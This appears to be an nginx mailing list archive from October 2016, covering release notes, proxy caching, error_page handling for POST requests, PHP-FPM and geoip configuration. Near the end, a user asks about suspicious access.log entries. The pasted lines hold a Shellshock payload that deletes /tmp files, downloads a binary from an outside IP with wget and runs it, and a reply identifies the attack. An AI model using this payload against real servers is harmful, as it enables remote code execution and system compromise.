error. The documentation suggests that "set" is not available within the "stream" system. So you need a different way of setting a variable. Perhaps "map" will do what you want? f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Tue Oct 18 15:34:03 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 18 Oct 2016 18:34:03 +0300 Subject: nginx-1.10.2 Message-ID: <20161018153403.GJ73038@mdounin.ru> Changes with nginx 1.10.2 18 Oct 2016 *) Change: the "421 Misdirected Request" response now used when rejecting requests to a virtual server different from one negotiated during an SSL handshake; this improves interoperability with some HTTP/2 clients when using client certificates. *) Change: HTTP/2 clients can now start sending request body immediately; the "http2_body_preread_size" directive controls size of the buffer used before nginx will start reading client request body. *) Bugfix: a segmentation fault might occur in a worker process when using HTTP/2 and the "proxy_request_buffering" directive. *) Bugfix: the "Content-Length" request header line was always added to requests passed to backends, including requests without body, when using HTTP/2. *) Bugfix: "http request count is zero" alerts might appear in logs when using HTTP/2. *) Bugfix: unnecessary buffering might occur when using the "sub_filter" directive; the issue had appeared in 1.9.4. *) Bugfix: socket leak when using HTTP/2. *) Bugfix: an incorrect response might be returned when using the "aio threads" and "sendfile" directives; the bug had appeared in 1.9.13. *) Workaround: OpenSSL 1.1.0 compatibility. -- Maxim Dounin http://nginx.org/ From francis at daoine.org Tue Oct 18 19:12:40 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 20:12:40 +0100 Subject: Problem with cache key In-Reply-To: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org> References: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161018191240.GL11677@daoine.org> On Mon, Oct 17, 2016 at 09:50:15AM -0400, CarstenK. wrote: Hi there, > If i send a request to url A with Chrom and another request with curl or > firefox i have a cache miss. > If isend a request to the same url with curl on two different machines the > answer is a cache hit, thats fine. If you look at the request from nginx to upstream, and the response from upstream to nginx, can you see the headers? Particularly the Vary: header of the response -- often it will include "User-Agent", which would explain what you see. If that is the issue, and you know that upstream sends the same content to all user-agents, then you can configure nginx so that that piece is not used in nginx's decision to cache. According to http://nginx.org/r/proxy_ignore_headers, > proxy_ignore_headers X-Accel-Expires Expires Cache-Control; "Vary" is the most likely of the fields that you could ignore that you do not. Cheers, f -- Francis Daly francis at daoine.org From kworthington at gmail.com Wed Oct 19 14:09:37 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Wed, 19 Oct 2016 10:09:37 -0400 Subject: [nginx-announce] nginx-1.10.2 In-Reply-To: <20161018153408.GK73038@mdounin.ru> References: <20161018153408.GK73038@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.10.2 for Windows https://kevinworthington.com/ nginxwin1102 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Oct 18, 2016 at 11:34 AM, Maxim Dounin wrote: > Changes with nginx 1.10.2 18 Oct > 2016 > > *) Change: the "421 Misdirected Request" response now used when > rejecting requests to a virtual server different from one negotiated > during an SSL handshake; this improves interoperability with some > HTTP/2 clients when using client certificates. > > *) Change: HTTP/2 clients can now start sending request body > immediately; the "http2_body_preread_size" directive controls size > of > the buffer used before nginx will start reading client request body. > > *) Bugfix: a segmentation fault might occur in a worker process when > using HTTP/2 and the "proxy_request_buffering" directive. > > *) Bugfix: the "Content-Length" request header line was always added to > requests passed to backends, including requests without body, when > using HTTP/2. > > *) Bugfix: "http request count is zero" alerts might appear in logs > when > using HTTP/2. > > *) Bugfix: unnecessary buffering might occur when using the > "sub_filter" > directive; the issue had appeared in 1.9.4. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: an incorrect response might be returned when using the "aio > threads" and "sendfile" directives; the bug had appeared in 1.9.13. > > *) Workaround: OpenSSL 1.1.0 compatibility. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From marques+nginx at linode.com Wed Oct 19 20:39:41 2016 From: marques+nginx at linode.com (Marques Johansson) Date: Wed, 19 Oct 2016 16:39:41 -0400 Subject: proxy_next_upstream exemption for 429 "too many requests" Message-ID: "proxy_next_upstream error" has exemptions for 402 and 403. Should it not have exemptions for 429 "Too many requests" as well? I want proxied servers' 503 and 429 responses with "Retry-After" to be delivered to the client as the server responded. The 429s in this case contain json bodies. I assume I should use proxy_pass_header to get Retry-After preserved in the responses, but what should I do to get 429 responses returned without modification (short of a feature request that proxy_next_upstream be modified)? -------------- next part -------------- An HTML attachment was scrubbed... URL: From piotrsikora at google.com Thu Oct 20 00:21:27 2016 From: piotrsikora at google.com (Piotr Sikora) Date: Wed, 19 Oct 2016 17:21:27 -0700 Subject: proxy_next_upstream exemption for 429 "too many requests" In-Reply-To: References: Message-ID: Hey Marques, coincidentally, I sent patches for 429 yesterday: http://mailman.nginx.org/pipermail/nginx-devel/2016-October/009003.html http://mailman.nginx.org/pipermail/nginx-devel/2016-October/009004.html Best regards, Piotr Sikora On Wed, Oct 19, 2016 at 1:39 PM, Marques Johansson wrote: > "proxy_next_upstream error" has exemptions for 402 and 403. Should it not > have exemptions for 429 "Too many requests" as well? > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > delivered to the client as the server responded. The 429s in this case > contain json bodies. > > I assume I should use proxy_pass_header to get Retry-After preserved in > the responses, but what should I do to get 429 responses returned without > modification (short of a feature request that proxy_next_upstream be > modified)? > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From piotrsikora at google.com Thu Oct 20 00:37:16 2016 From: piotrsikora at google.com (Piotr Sikora) Date: Wed, 19 Oct 2016 17:37:16 -0700 Subject: proxy_next_upstream exemption for 429 "too many requests" In-Reply-To: References: Message-ID: Hey Marques, > "proxy_next_upstream error" has exemptions for 402 and 403. Should it not > have exemptions for 429 "Too many requests" as well? > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > delivered to the client as the server responded. The 429s in this case > contain json bodies. Actually, after re-reading your email, I'm confused... 429 responses aren't matched by "proxy_next_upstream error" (with or without my patches), and are passed as-is to the client. Maybe you're using "proxy_intercept_errors" with custom error pages? Best regards, Piotr Sikora From JEDC at ramboll.com Thu Oct 20 09:19:29 2016 From: JEDC at ramboll.com (Jens Dueholm Christensen) Date: Thu, 20 Oct 2016 09:19:29 +0000 Subject: Static or dynamic content In-Reply-To: <20161018062827.GJ11677@daoine.org> References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> <20161018062827.GJ11677@daoine.org> Message-ID: On Tuesday, October 18, 2016 08:28 AM Francis Daly wrote, > So: a POST for /x will be handled in @xact, which will return 503, > which will be handled in @error_503, which will be rewritten to a POST > for /error503.html which will be sent to the file error/error503.html, > which will return a 405. > > Is that what you see? Yes - per your comments later in your reply about internal redirects and the debug log, I enabled the debug log which confirms it (several lines have been removed from the following sniplet, but its pretty clear): --- 2016/10/20 10:23:45 [debug] 8408#2492: *1 http upstream request: "/2?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http proxy status 503 "503 Service Unavailable" 2016/10/20 10:23:45 [debug] 8408#2492: *1 finalize http upstream request: 503 2016/10/20 10:23:45 [debug] 8408#2492: *1 http special response: 503, "/2?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 test location: "@error_503" 2016/10/20 10:23:45 [debug] 8408#2492: *1 using location: @error_503 "/2?" 2016/10/20 10:23:45 [notice] 8408#2492: *1 "^(.*)$" matches "/2" while sending to client, client: 127.0.0.1, server: localhost, request: "POST /2 HTTP/1.1", upstream: "http://127.0.0.1:4431/2", host: "localhost" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http script copy: "/error503.html" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http script regex end 2016/10/20 10:23:45 [notice] 8408#2492: *1 rewritten data: "/error503.html", args: "" while sending to client, client: 127.0.0.1, server: localhost, request: "POST /2 HTTP/1.1", upstream: "http://127.0.0.1:4431/2", host: "localhost" 2016/10/20 10:23:45 [debug] 8408#2492: *1 http finalize request: 405, "/error503.html?" a:1, c:2 2016/10/20 10:23:45 [debug] 8408#2492: *1 http special response: 405, "/error503.html?" 2016/10/20 10:23:45 [debug] 8408#2492: *1 HTTP/1.1 405 Not Allowed Server: nginx/1.8.0 Date: Thu, 20 Oct 2016 08:23:45 GMT Content-Type: text/html Content-Length: 172 Connection: keep-alive --- > Two sets of questions remain: > what output do you get when you use the test config in the earlier mail? Alas I did not try that config yet, but I would assume that my tests would show exactly the same as yours - should I try or is it purely academic? > what output do you want? > That last one is probably "http 503 with the content of *this* file"; > and is probably completely obvious to you; but I don't think it has been > explicitly stated here, and it is better to know than to try guessing. 100% correct. If upstream returns 503 or 404 I would like to have the contents of the error_page for 404 or 503 returned to the client regardless of the HTTP request method used. > If you remove the error_page 503 part or the proxy_intercept_errors part, > does the expected http status code get to your client? Yes! > I think that the nginx handling of subrequests from a POST for error > handling is a bit awkward here. But until someone who cares comes up with > an elegant and consistent alternative, I expect that it will remain as-is. Alas.. > Possibly in your case you could convert the POST to a GET by using > proxy_method and proxy_pass within your error_page location. > That also feels inelegant, but may give the output that you want. Yes, similar "solutions" like this (http://leandroardissone.com/post/19690882654/nginx-405-not-allowed ) and others are IMO really ugly and it does make the configfile harder to understand and maintain over time. The "best" (but still ugly!) version I could find is where I catch the 405 error inside the @error_503 location (as described in the answer to this question http://stackoverflow.com/questions/16180947/return-503-for-post-request-in-nginx ), but I dislike the use of if and $request_filename in that solution - and it still doesn't make for easy understanding. How would you suggest I could use proxy_method and proxy_pass within the @error_503 location? I'm comming up short on how to do that without beginning to resend a POST request as a GET request to upstream - a new request that could now potentially succeed (since a haproxy backend server could become available between the POST failed and the request is retried as a GET)? Regards, Jens Dueholm Christensen From marques+nginx at linode.com Thu Oct 20 12:30:21 2016 From: marques+nginx at linode.com (Marques Johansson) Date: Thu, 20 Oct 2016 08:30:21 -0400 Subject: proxy_next_upstream exemption for 429 "too many requests" Message-ID: I was mistaken. I wasn't triggering 429s reliably. They are being passed through as expected. I will use proxy_pass_header Retry-After to get the behavior I wanted for 503s. Some of my server 503s may be application/json while others are text/html. I would like to pass the json responses through while nginx returns its own 503 response instead of server 503 html responses. That doesn't seem to be possible with the existing proxy options. On Wed, Oct 19, 2016 at 8:37 PM, Piotr Sikora wrote: > Hey Marques, > > > "proxy_next_upstream error" has exemptions for 402 and 403. Should it > not > > have exemptions for 429 "Too many requests" as well? > > > > I want proxied servers' 503 and 429 responses with "Retry-After" to be > > delivered to the client as the server responded. The 429s in this case > > contain json bodies. > > Actually, after re-reading your email, I'm confused... 429 responses > aren't matched by "proxy_next_upstream error" (with or without my > patches), and are passed as-is to the client. > > Maybe you're using "proxy_intercept_errors" with custom error pages? > > Best regards, > Piotr Sikora > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yushang at outlook.com Thu Oct 20 15:06:02 2016 From: yushang at outlook.com (shang yu) Date: Thu, 20 Oct 2016 15:06:02 +0000 Subject: content-type does not match mime type Message-ID: Hi dear all, When I GET a xlsx file from nginx server , the response header Content-Type is application/octet-stream , not the expected application/vnd.openxmlformats-officedocument.spreadsheetml.sheet , why ? many thanks !!! -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Oct 19 12:52:06 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Wed, 19 Oct 2016 08:52:06 -0400 Subject: Using Nginx as proxy content are "striped" In-Reply-To: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> References: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Message-ID: proxy_pass http://192.168.1.100:38080; (remove the trailing slash) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270423#msg-270423 From nginx-forum at forum.nginx.org Wed Oct 19 13:36:37 2016 From: nginx-forum at forum.nginx.org (Phani Sreenivasa Prasad) Date: Wed, 19 Oct 2016 09:36:37 -0400 Subject: how to check nginx has really sent response? Message-ID: <35a9ce49d4e91cf9ff2d3d94ca5f0712.NginxMailingListEnglish@forum.nginx.org> Hi I am using fastCGI for my application to talk to nginx. I have a requirement such that when my application processes request and sent the response , would like to check whether nginx also sent response successfully to client. ? How can this be achieved? Is there a way I can register a callback with nginx with any of its directives? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270426,270426#msg-270426 From nginx-forum at forum.nginx.org Wed Oct 19 12:04:21 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Wed, 19 Oct 2016 08:04:21 -0400 Subject: Using Nginx as proxy content are "striped" Message-ID: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Hello All, I am using Nginx for proxy to OpenGrok server using following conf below , the issue i have is that the proxy works but seems to be missing content and not works as expected. Any idea how to make it work better? Please advise Thanks server { listen 80; return 301 https://$host$request_uri; } server { listen 443; server_name gfn-docker.daet.local; ssl_certificate /etc/nginx/cert.crt; ssl_certificate_key /etc/nginx/cert.key; ssl on; ssl_session_cache shared:SSL:30m; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!eNULL:!EXPORT:!CAMELLIA:!DES:!MD5:!PSK:!RC4; ssl_prefer_server_ciphers on; access_log /var/log/nginx/jenkins.access.log; location / { auth_basic "Restricted Content"; auth_basic_user_file /etc/nginx/.htpasswd; proxy_pass http://192.168.1.100:38080/; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_max_temp_file_size 0; client_max_body_size 30m; client_body_buffer_size 512k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 12k; proxy_buffers 4 64k; proxy_busy_buffers_size 128k; proxy_temp_file_write_size 128k; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270422#msg-270422 From nginx-forum at forum.nginx.org Wed Oct 19 14:08:06 2016 From: nginx-forum at forum.nginx.org (tbaror) Date: Wed, 19 Oct 2016 10:08:06 -0400 Subject: Using Nginx as proxy content are "striped" In-Reply-To: References: <941175a1ca8ff11c7cf152258f97a27e.NginxMailingListEnglish@forum.nginx.org> Message-ID: Thanks but now its redirect to the actual server , how i would enforce it pass trough the proxy? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270422,270427#msg-270427 From nginx-forum at forum.nginx.org Wed Oct 19 10:05:54 2016 From: nginx-forum at forum.nginx.org (CarstenK.) Date: Wed, 19 Oct 2016 06:05:54 -0400 Subject: Problem with cache key In-Reply-To: <20161018191240.GL11677@daoine.org> References: <20161018191240.GL11677@daoine.org> Message-ID: <7ce0c8b0fd6b5cce9d489fa692315728.NginxMailingListEnglish@forum.nginx.org> Hi Francis, thank you for your fast reply. I took a look at the header nginx response. ##### Header nginx ### Response Header ## Chrome HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Oct 2016 09:54:07 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 15991 Connection: keep-alive Content-Language: de-DE Vary: Accept-Encoding Content-Encoding: gzip X-Cache-Status: MISS ## Firefox HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Oct 2016 09:53:50 GMT Content-Type: text/html;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Language: de-DE Vary: Accept-Encoding Content-Encoding: gzip X-Cache-Status: MISS How can i have a look for the headers of upstream servers? For testing i had set "proxy_ignore_headers" to "X-Accel-Expires Expires Cache-Control Vary Set-Cookie X-Accel-Limit-Rate X-Accel-Buffering X-Accel-Charset" but there is no difference. best, Carsten Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270324,270419#msg-270419 From francis at daoine.org Thu Oct 20 16:23:51 2016 From: francis at daoine.org (Francis Daly) Date: Thu, 20 Oct 2016 17:23:51 +0100 Subject: Static or dynamic content In-Reply-To: References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> <20161018062827.GJ11677@daoine.org> Message-ID: <20161020162351.GM11677@daoine.org> On Thu, Oct 20, 2016 at 09:19:29AM +0000, Jens Dueholm Christensen wrote: > On Tuesday, October 18, 2016 08:28 AM Francis Daly wrote, Hi there, > > what output do you get when you use the test config in the earlier mail? > > Alas I did not try that config yet, but I would assume that my tests would show exactly the same as yours - should I try or is it purely academic? Academic now, I think. > If upstream returns 503 or 404 I would like to have the contents of the error_page for 404 or 503 returned to the client regardless of the HTTP request method used. > > Possibly in your case you could convert the POST to a GET by using > > proxy_method and proxy_pass within your error_page location. > How would you suggest I could use proxy_method and proxy_pass within the @error_503 location? > I'm comming up short on how to do that without beginning to resend a POST request as a GET request to upstream - a new request that could now potentially succeed (since a haproxy backend server could become available between the POST failed and the request is retried as a GET)? I was imagining doing a proxy_pass to nginx, not to upstream, for the 503 errors. So dealing with upstream is not a concern. However, I've tried testing this now, and it all seems to work happily if you omit the @named location for error_page. I add "internal" below, to avoid having the url be directly externally-accessible. Does this do what you want it to do? server { listen 8080; error_page 503 /errors/503.html; location / { root html; try_files /offline.html @xact; } location @xact { # this server is "upstream" proxy_pass http://127.0.0.1:8082; proxy_intercept_errors on; } location = /errors/503.html { internal; # this serves $document_root/errors/503.html } } For me, when "upstream" returns 503, I get back 503 with the content of my /usr/local/nginx/html/errors/503.html, whether the initial request was a GET or a POST. So perhaps the previous awkwardness was due to the @named location and the various rewrites. If that does do what you want, then you can add something similar for 404, I guess. Cheers, f -- Francis Daly francis at daoine.org From ben+nginx at list-subs.com Sat Oct 22 10:37:50 2016 From: ben+nginx at list-subs.com (Ben) Date: Sat, 22 Oct 2016 11:37:50 +0100 Subject: NGINX and Slim PHP framework Message-ID: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> Hi, nginx/1.10.0 & PHP 7.0.8 I'm struggling to get NGINX to work with the Slim PHP framework for paths. The base index.php works fine (e.g. http://example.com works), however if I try a framework path (e.g. http://example.com/hello/test), NGINX sends me what Firefox seems to call a "DMS file" (if I download and open it, it displays the source code from the PHP file). My NGINX config looks as follows: server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html/bobs/public; index index.php; server_name _; location / { try_files $uri $uri/ /index.php$is_args$args =404; } location ~ ^(.+\.php)(.*)$ { fastcgi_split_path_info ^(.+\.php)(.*)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; include fastcgi_params; } } And my SLIM index.php : get('/', function ($request, $response, $args) { return $response->withStatus(200)->write('Hello World!'); }); $app->get('/hello/{name}', function (Request $request, Response $response) { $name = $request->getAttribute('name'); $response->getBody()->write("Hello, $name"); return $response; }); // Run application $app->run(); ?> From me at myconan.net Sat Oct 22 10:41:44 2016 From: me at myconan.net (Edho Arief) Date: Sat, 22 Oct 2016 19:41:44 +0900 Subject: NGINX and Slim PHP framework In-Reply-To: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> References: <9fb4977a-b0bb-b21a-abf8-88b66626cd9a@list-subs.com> Message-ID: <1477132904.2942974.763908033.3F3E1563@webmail.messagingengine.com> Hi, On Sat, Oct 22, 2016, at 19:37, Ben wrote: > Hi, > > nginx/1.10.0 & PHP 7.0.8 > > I'm struggling to get NGINX to work with the Slim PHP framework for > paths. > > The base index.php works fine (e.g. http://example.com works), however > if I try a framework path (e.g. http://example.com/hello/test), NGINX > sends me what Firefox seems to call a "DMS file" (if I download and open > it, it displays the source code from the PHP file). > > My NGINX config looks as follows: > > server { > listen 80 default_server; > listen [::]:80 default_server; > root /var/www/html/bobs/public; > index index.php; > server_name _; > location / { > try_files $uri $uri/ /index.php$is_args$args =404; try_files immediately returns the file without doing another location lookup so here it'll just return the index.php as is. index.php should be the last one. It doesn't make sense to have =404 anyway since index.php part will always succeed. From reallfqq-nginx at yahoo.fr Sat Oct 22 13:42:54 2016 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Sat, 22 Oct 2016 15:42:54 +0200 Subject: content-type does not match mime type In-Reply-To: References: Message-ID: Associating types to file extensions is done through the types directive. You probably have a default_type directive in a global location defining it to application/octet-stream. --- *B. R.* On Thu, Oct 20, 2016 at 5:06 PM, shang yu wrote: > Hi dear all, > > When I GET a xlsx file from nginx server , the response header > Content-Type is application/octet-stream , not the expected > application/vnd.openxmlformats-officedocument.spreadsheetml.sheet , why ? > many thanks !!! > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sat Oct 22 10:19:54 2016 From: nginx-forum at forum.nginx.org (janro) Date: Sat, 22 Oct 2016 06:19:54 -0400 Subject: Suspicious log records Message-ID: Hi everyone. I'm newbie with Nginx and with servers and I thought to ask your opinion about the log input I noticed from last night. There's clearly a some sort of malicious attempt in access.log which is repeated four times. In error.log there's only 'closed keepalive connection' records, which matches with those four attempts. Everything runs fine on server side. I just like to know that is this just a normal day in a world of server logs or something critical that need actions? Access.log 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-" Error.log 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed keepalive connection 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed keepalive connection 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed keepalive connection 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed keepalive connection Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472 From lists at ssl-mail.com Sat Oct 22 16:30:21 2016 From: lists at ssl-mail.com (lists at ssl-mail.com) Date: Sat, 22 Oct 2016 09:30:21 -0700 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? Message-ID: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> I have a working nginx/1.11.5 instance, with this in config ... http( ... 134 map_hash_bucket_size 4096; ... ) ... when I add geoip blocking ... http ( + geoip_country /var/lib/GeoIP/GeoIP.dat; + map $geoip_country_code $allowed_country { + default yes; + XX no; # some country ... 134 map_hash_bucket_size 4096; ... ) ... config check now reports nginx: [emerg] "map_hash_bucket_size" directive is duplicate in /etc/nginx/nginx.conf:134 simply commenting out - map_hash_bucket_size 4096; + #map_hash_bucket_size 4096; fixes the config error. Why can't 'map_hash_bucket_size' be set in the presence of the geoip_country snippet? Config error? Bug? other? From nginx-forum at forum.nginx.org Sat Oct 22 16:42:40 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Sat, 22 Oct 2016 12:42:40 -0400 Subject: nginx 1.11.5 'duplicate' map_hash_bucket_size error when geoip_country block used? In-Reply-To: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> References: <1477153821.3004284.764075641.7D154D74@webmail.messagingengine.com> Message-ID: <1fa6642434bea5376cefcfe8f1888f46.NginxMailingListEnglish@forum.nginx.org> Syntax: map_hash_bucket_size size; Default: map_hash_bucket_size 32|64|128; Context: http The err message is valid but may be misleading due to the places you used, a dup msg does not indicate the valid context area. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270480,270481#msg-270481 From rpaprocki at fearnothingproductions.net Sat Oct 22 16:57:03 2016 From: rpaprocki at fearnothingproductions.net (Robert Paprocki) Date: Sat, 22 Oct 2016 09:57:03 -0700 Subject: Suspicious log records In-Reply-To: References: Message-ID: <80A04B68-F3CA-4007-89DA-7A528EAFE3D4@fearnothingproductions.net> Looks like a shellshock attempt. Provided that you're running a modern of version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit. Welcome to the wild world of running a public server! > On Oct 22, 2016, at 03:19, janro wrote: > > Hi everyone. > > I'm newbie with Nginx and with servers and I thought to ask your opinion > about the log input I noticed from last night. > > There's clearly a some sort of malicious attempt in access.log which is > repeated four times. In error.log there's only 'closed keepalive connection' > records, which matches with those four attempts. > > Everything runs fine on server side. I just like to know that is this just a > normal day in a world of server logs or something critical that need > actions? > > Access.log > > 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "() > { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 > -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> > /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo > /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> > /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c > \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O > /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo > chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >> > /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 > /tmp/Run.sh;/tmp/Run.sh\x22" "-" > > 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 